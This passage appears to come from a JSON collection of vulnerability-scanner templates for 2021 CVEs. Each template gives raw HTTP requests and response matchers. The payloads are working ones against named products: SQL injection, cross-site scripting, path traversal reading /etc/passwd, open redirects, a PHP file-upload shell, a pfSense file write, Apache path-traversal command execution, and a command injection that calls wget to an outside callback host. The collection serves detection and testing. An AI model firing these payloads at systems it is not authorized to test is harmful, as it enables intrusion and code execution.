SQL Injection","severity":"high"},"requests":[{"raw":["GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nGET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"WP Statistics\")"],"condition":"and"},{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 500","contains(body_2, \">WordPress &rsaquo; Error<\") && contains(body_2, \">Your request is not valid.<\")"],"condition":"and"}]}]},{"id":"CVE-2021-43725","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?data[performredirect]=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&page=login"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>","name=\"data[performredirect]"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31250","info":{"name":"CHIYU TCP/IP Converter - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY"],"headers":{"Authorization":"Basic OmFkbWlu"},"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["\"><script>alert({{randstr}})</script>"]}]}]},{"id":"CVE-2021-34429","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /%u002e/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /.%00/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40972","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[mail]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34370","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-43496","info":{"name":"Clustering Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/img/../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-24862","info":{"name":"WordPress RegistrationMagic <5.0.1.6 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-registration-form-builder-with-submission-manager/admin/js/script_rm_utilities.js HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"rm_user_role_mananger_form\")"],"condition":"and"}]}]},{"id":"CVE-2021-29625","info":{"name":"Adminer <=4.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24169","info":{"name":"WordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"woo-order-export-lite\")"],"condition":"and"}]}]},{"id":"CVE-2021-25114","info":{"name":"WordPress Paid Memberships Pro <2.6.7 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","contains(header_1, \"application/json\")","status_code == 200","contains(body_2, 'other_discount_code_')"],"condition":"and"}]}]},{"id":"CVE-2021-3223","info":{"name":"Node RED Dashboard <2.26.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd","{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Node-RED web server is listening"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-39320","info":{"name":"WordPress Under Construction <1.19 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php/\"><script>alert(document.domain)</script>/?page=under-construction HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"/wp-admin/admin.php/\"><script>alert(document.domain)</script>","under-construction"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40973","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[lastname]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24452","info":{"name":"WordPress W3 Total Cache <2.1.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=w3tc_extensions&extension='-alert(document.domain)-' HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, 'extensions/\\'-alert(document.domain)-\\'') && contains(body_2, 'w3-total-cache')","contains(header_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2021-44427","info":{"name":"Rosario Student Information System Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/Side.php"],"body":"sidefunc=update&syear=111'","headers":{"Content-Type":"application/x-www-form-urlencoded; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB Execute Failed. ERROR:","unterminated quoted string"],"condition":"and"},{"type":"word","part":"header","words":["RosarioSIS="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35250","info":{"name":"SolarWinds Serv-U 15.3 - Directory Traversal","severity":"high"},"requests":[{"raw":["POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n/?Command=NOOP\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-41648","info":{"name":"PuneethReddyHC action.php SQL Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/action.php"],"body":"proId=1'&addToCart=1","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Warning: mysqli_num_rows() expects parameter 1 to be","xdebug-error xe-warning"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21402","info":{"name":"Jellyfin <10.7.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/","{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/octet-stream"]},{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21287","info":{"name":"MinIO Browser API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /minio/webrpc HTTP/1.1\nHost: {{interactsh-url}}\nContent-Type: application/json\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36\nContent-Length: 76\n\n{\"id\":1,\"jsonrpc\":\"2.0\",\"params\":{\"token\":  \"Test\"},\"method\":\"web.LoginSTS\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["We encountered an internal error"]}]}]},{"id":"CVE-2021-21803","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42567","info":{"name":"Apereo CAS Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cas/v1/tickets/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=test\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img/src/onerror=alert(document.domain)>","java.util.HashMap"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-39322","info":{"name":"WordPress Easy Social Icons Plugin < 3.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php/</script><script>alert(document.domain)</script>/?page=cnss_social_icon_page HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24284","info":{"name":"WordPress Kaswara Modern VC Addons <=3.0.1 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------d3be34324392a708\n\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"fonticonzipfile\"; filename=\"{{zip_file}}.zip\"\nContent-Type: application/octet-stream\n\n{{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}}\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"fontsetname\"\n\n{{zip_file}}\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"action\"\n\nuploadFontIcon\n--------------------------d3be34324392a708--\n","GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css"]},{"type":"word","part":"body_2","words":["phpinfo()"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-1498","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /storfs-asup HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28419","info":{"name":"SEO Panel 4.8.0 - Blind SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: _csrf={{rand_base(54,\"abc\")}};\n","POST /login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}login.php\nCookie: _csrf={{rand_base(54,\"abc\")}};\n\nsec=login&red_referer=http%3A%2F%2F{{BaseURL}}&userName={{username}}&password={{password}}&login=\n","GET /archive.php?from_time=2021-04-25&order_col=(SELECT+7397+FROM(SELECT(SLEEP(3)))test)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id= HTTP/1.1\nHost: {{Hostname}}\nCookie: _csrf={{rand_base(54,\"abc\")}};\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_3>=6","status_code_3 == 200","contains(body_3, \"Overall Report Summary\")"],"condition":"and"}]}]},{"id":"CVE-2021-41277","info":{"name":"Metabase Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/geojson?url=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30213","info":{"name":"Knowage Suite 7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24276","info":{"name":"WordPress Supsystic Contact Form <1.7.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42667","info":{"name":"Online Event Booking and Reservation System 2.3.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET /views/?v=USER&ID=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2Cmd5({{num}})%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%3B--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42551","info":{"name":"NetBiblio WebOPAC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x","{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SearchTerm: 'x'+alert(1)+'x',","SearchTerm: 'x\\\\'+alert(1),//',"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["NetBiblio"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42627","info":{"name":"D-Link DIR-615 - Unauthorized Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wan.htm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["src='menu.js?v=\"+Math.random()+\"'></scr\"+\"ipt>\");","var ipv6conntype"],"condition":"and"},{"type":"word","part":"header","words":["Virtual Web"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35587","info":{"name":"Oracle Access Manager - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/oam/server/opensso/sessionservice"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["x-oracle-dms-ecid","x-oracle-dms-rid"],"case-insensitive":true,"condition":"or"},{"type":"word","part":"body","words":["/oam/pages/css/general.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37833","info":{"name":"Hotel Druid 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1","{{BaseURL}}/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1","{{BaseURL}}/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1","{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26812","info":{"name":"Moodle Jitsi Meet 2.7-2.8.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(document.domain);"]},{"type":"word","part":"header","words":["MoodleSession"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25028","info":{"name":"WordPress Event Tickets < 5.2.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-45232","info":{"name":"Apache APISIX Dashboard <2.10.1 - API Unauthorized Access","severity":"critical"},"requests":[{"method":"GET","path":["{{RootURL}}/apisix/admin/migrate/export"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"Consumers\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27132","info":{"name":"Sercomm VD625 Smart Modems - CRLF Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Disposition: attachment;filename=test.txt","Set-Cookie:CRLFInjection=Test","Location: interact.sh","X-XSS-Protection:0"],"condition":"and"},{"type":"status","part":"header","status":[404]}]}]},{"id":"CVE-2021-32618","info":{"name":"Python Flask-Security - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=\\\\\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-26475","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</title><script>alert('{{randstr}}')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35336","info":{"name":"Tieline IP Audio Gateway <=2.6.4.8 - Unauthorized Remote Admin Panel Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/get_device_details"],"headers":{"Authorization":"Digest username=\"admin\", realm=\"Bridge-IT\", nonce=\"d24d09512ebc3e43c4f6faf34fdb8c76\", uri=\"/api/get_device_details\", response=\"d052e9299debc7bd9cb8adef0a83fed4\", qop=auth, nc=00000001, cnonce=\"ae373d748855243d\"","Referer":"{{BaseURL}}/assets/base/home.html"},"matchers-condition":"and","matchers":[{"type":"word","words":["<SERIAL>","<VERSION>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44515","info":{"name":"Zoho ManageEngine Desktop Central - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /STATE_ID/123/agentLogUploader HTTP/1.1\nHost: {{Hostname}}\nCookie: STATE_COOKIE=&_REQS/_TIME/123\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 0"]},{"type":"word","part":"header","words":["UEMJSESSIONID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24342","info":{"name":"WordPress JNews Theme <8.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /?ajax-request=jnews HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nlang=en_US&cat_id=6\"></script><script>alert(document.domain)</script>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41282","info":{"name":"pfSense - Arbitrary File Write","severity":"high"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=\n","GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\\x3c\\x3fphp+var_dump(md5(\\x27CVE-2021-41282\\x27));unlink(__FILE__)\\x3b\\x3f\\x3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1\nHost: {{Hostname}}\n","GET /test.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(body, 'c3959e8a43f1b39b0d1255961685a238')","status_code==200"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["(sid:[a-z0-9,;:]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25111","info":{"name":"WordPress English Admin <1.5.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-28918","info":{"name":"Netmask NPM Package - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://0177.0.0.1/server-status","{{BaseURL}}/?host=http://0177.0.0.1/server-status","{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Apache Server Status","Server Version"],"condition":"and"},{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-38704","info":{"name":"ClinicCases 7.3.3 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42013","info":{"name":"Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n\n"],"stop-at-first-match":true,"unsafe":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-42013"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-21978","info":{"name":"VMware View Planner <4.6 SP1- Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; 